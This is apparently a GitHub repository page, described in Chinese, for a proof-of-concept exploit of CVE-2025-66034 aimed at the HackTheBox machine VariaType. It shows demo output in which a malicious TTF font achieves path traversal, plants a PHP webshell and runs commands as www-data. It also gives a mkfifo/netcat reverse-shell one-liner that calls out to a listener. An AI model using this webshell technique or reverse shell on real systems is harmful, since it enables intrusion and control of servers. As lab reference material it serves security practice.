manbahadurthapa1248/CVE-2025-66034-Poc-to-Get-RCE-for-HTB-VariaType

GitHub: manbahadurthapa1248/CVE-2025-66034-Poc-to-Get-RCE-for-HTB-VariaType

针对 CVE-2025-66034 漏洞的 Python PoC 脚本,通过构造恶意 TTF 字体文件实现路径遍历和 RCE。

Stars: 1 | Forks: 0

# CVE-2025-66034-Poc-to-Get-RCE-for-HTB-VariaType 只需运行该脚本,并确保你已在 /etc/hosts 文件中添加了相关主机。 ``` python3 exploit.py ``` 尽情享用吧!!! *注意:这不是我的原创作品。我将其保留在此仅供参考。* # **演示:** ``` python3 exploy.py [*] Building TTFs... [+] Built light=656b regular=656b [*] Trying: ../../../var/www/portal.variatype.htb/public/shell.php [*] HTTP 200 [+] SHELL: http://portal.variatype.htb/shell.php [+] `HVAR /OS/2@ `STATxph ,fvar| $glyf head, 6hhea $hmtx nameC ???? fuid=33(www-data) gid=33(www-data) groups=33(www-data) W400Weight [+] Interactive shell ready [+] URL: http://portal.variatype.htb/shell.php?c= variatype> ``` ``` variatype> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc IP PORT >/tmp/f ``` 在监听器上获取 shell。
标签:CISA项目, CVE-2025-66034, DNS 反向解析, HackTheBox, HTB, OPA, PoC, Python, RCE, TTF, VariaType, Webshell, Web安全, 云资产清单, 协议分析, 反弹Shell, 字体解析漏洞, 数据展示, 无后门, 暴力破解, 权限提升, 漏洞复现, 红队, 编程工具, 网络安全, 网络安全审计, 脚本, 蓝队分析, 路径遍历, 远程代码执行, 逆向工具, 逆向工程, 隐私保护, 靶场, 黑客技术